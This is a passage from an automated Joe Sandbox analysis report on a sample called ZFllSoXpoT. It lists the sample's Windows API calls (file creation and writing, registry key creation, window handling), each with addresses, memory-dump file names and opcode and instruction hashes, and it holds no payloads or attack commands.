                                                                            • String ID:
                                                                            • API String ID: 629608716-0
                                                                            • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                            • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                                            • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                                            • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                                            APIs
                                                                              • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                              • Part of subcall function 0041EEB4: 74285940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                                            • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                                              • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                              • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$74285940CurrentEnablePathPrepareThreadWrite
                                                                            • String ID:
                                                                            • API String ID: 1215381881-0
                                                                            • Opcode ID: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                            • Instruction ID: 552ca42e7a4f22222615ff1de8f8c20df724e6475abae56b3c63f202feb1ec23
                                                                            • Opcode Fuzzy Hash: 7310e4a240e1736cfb30b9abd7a9c8d32e29debdd45fb2130da0edd2c14fc99c
                                                                            • Instruction Fuzzy Hash: 28F0E270248300FFEB059BB2EDD6B2577E8E319716F91043BF504866D0EA795D40C96E
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction ID: d0e136ad155d69288fc423feb27b218c22c44688115b59a91c3ffefc647f2292
                                                                            • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                            • Instruction Fuzzy Hash: F0F0FF70509209DBBB1CCF54D0919AF7B71EB59310F20806FE907877A0D6346A80D759
                                                                            APIs
                                                                            • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                            • Instruction ID: 39ad6e161323637dbb8254467e02d50acedd081d31d6b9d15e1adfc5f54150e8
                                                                            • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                            • Instruction Fuzzy Hash: 6EF02BB2200510AFDB84CF9CD9C0F9373ECEB0C210B0481A6FA08CF24AD220EC108BB0
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                            • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                            • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 004507F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                            • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                            • Opcode Fuzzy Hash: 838f498b19bb2aafec3be0ee987651bf511c4e6d2f63907cf4f88042037e4973
                                                                            • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD24,?,00000001,?,?,00000000,?,0042CD76,00000000,00452A11,00000000,00452A32,?,00000000), ref: 0042CD07
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                            • Instruction ID: bebe06870d533199fa05ec681e6f815a7bc371a3e359dcca221b2f893a48d47d
                                                                            • Opcode Fuzzy Hash: a570e9d0cc49cd9ea48ac8d9958fbde071fca7bece3969a5989dcb135d147aed
                                                                            • Instruction Fuzzy Hash: 0AE06571304308BFD701EB62EC92A5EBBECD749714B914476B400D7592D5B86E008458
                                                                            APIs
                                                                            • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,0045325F,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8F7
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage
                                                                            • String ID:
                                                                            • API String ID: 1306739567-0
                                                                            • Opcode ID: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                            • Instruction ID: 1e04b5e42f682bd3307758a00633d1e15c64123c11c882a5e2d093d9edca25ee
                                                                            • Opcode Fuzzy Hash: 1d16c149c237ab05d394d1dcd15bc1a2ba242a73302d35381885c392630e106f
                                                                            • Instruction Fuzzy Hash: E7E0D86178432126F23524166C43B7B110E43C0704FD080267A809F3D6D6EE9949425E
                                                                            APIs
                                                                            • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateWindow
                                                                            • String ID:
                                                                            • API String ID: 716092398-0
                                                                            • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                            • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                            • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                            APIs
                                                                            • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE20
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Create
                                                                            • String ID:
                                                                            • API String ID: 2289755597-0
                                                                            • Opcode ID: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                            • Instruction ID: 00bf656f3cc58d957e3fc120c7d975a7f6f089e768df8f95d2ce2a55afbcf34e
                                                                            • Opcode Fuzzy Hash: b59592ccec0b1853c0d50eb209755673f49d30f0d63234ebc8c06611609486a1
                                                                            • Instruction Fuzzy Hash: 69E07EB2600119AF9B40DE8CDC81EEB37ADAB1D350F414016FA08E7200C274EC519BB4
                                                                            APIs
                                                                            • FindClose.KERNEL32(00000000,000000FF,00470C14,00000000,00471A10,?,00000000,00471A59,?,00000000,00471B92,?,00000000,?,00000000), ref: 00454BFA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseFind
                                                                            • String ID:
                                                                            • API String ID: 1863332320-0
                                                                            • Opcode ID: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                            • Instruction ID: 3c3cb6916585ff7422749358fc170cdffb6a73b651657da6609ae8be1e4b77d0
                                                                            • Opcode Fuzzy Hash: cdb9c2b7633e0d7853738bb459b1a46babdaf032508dd36dba6af5da7df12373
                                                                            • Instruction Fuzzy Hash: A7E065B0A056004BCB15DF3A858021A76D25FC5325F05C96AAC58CF397D63C84955656
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(004953B6,?,004953D8,?,?,00000000,004953B6,?,?), ref: 004146AB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                            • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                            • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                            • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                            APIs
                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FileWrite
                                                                            • String ID:
                                                                            • API String ID: 3934441357-0
                                                                            • Opcode ID: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                            • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                            • Opcode Fuzzy Hash: 5f93265df2524d0dcc0c9b34101366d534c30ce5f0cb0d235cb6b24d2b8f20db
                                                                            • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                            APIs
                                                                              • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                            • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                              • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: InfoParametersSystem$ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 3202724764-0
                                                                            • Opcode ID: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                            • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                            • Opcode Fuzzy Hash: 6539159081c566a845655d997cb077fb8df4a929aa301bd67fb88950e555413a
                                                                            • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                            APIs
                                                                            • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: TextWindow
                                                                            • String ID:
                                                                            • API String ID: 530164218-0
                                                                            • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                            • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                            • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                            • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                            APIs
                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,004515B7,00000000), ref: 0042CD3F
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesFile
                                                                            • String ID:
                                                                            • API String ID: 3188754299-0
                                                                            • Opcode ID: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                            • Instruction ID: 866207c2a99293721dc17515f5e31636ca325c5e587501d47fbe5ff4e718b97c
                                                                            • Opcode Fuzzy Hash: 25b3c26d3c79b78b40e0be7c0404abf70c39e9d787657ef1c43052f1caeba7d8
                                                                            • Instruction Fuzzy Hash: 77C08CE03222001A9A20A6BD2CC950F06CC891437A3A41F77B439E72E2D23DD8162018
                                                                            APIs
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467B94,00000000,00000000,00000000,0000000C,00000000), ref: 00466EC4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CallbackDispatcherUser
                                                                            • String ID:
                                                                            • API String ID: 2492992576-0
                                                                            • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                            • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                            • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                            • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                            APIs
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                            • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                            • Opcode Fuzzy Hash: 69b9da7e15ce352a50602e67f4a233c0d3270223495d3e32e43592fe9d1f4da4
                                                                            • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                            APIs
                                                                            • SetEndOfFile.KERNEL32(?,?,0045C6A6,00000000,0045C831,?,00000000,00000002,00000002), ref: 0045091F
                                                                              • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileLast
                                                                            • String ID:
                                                                            • API String ID: 734332943-0
                                                                            • Opcode ID: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
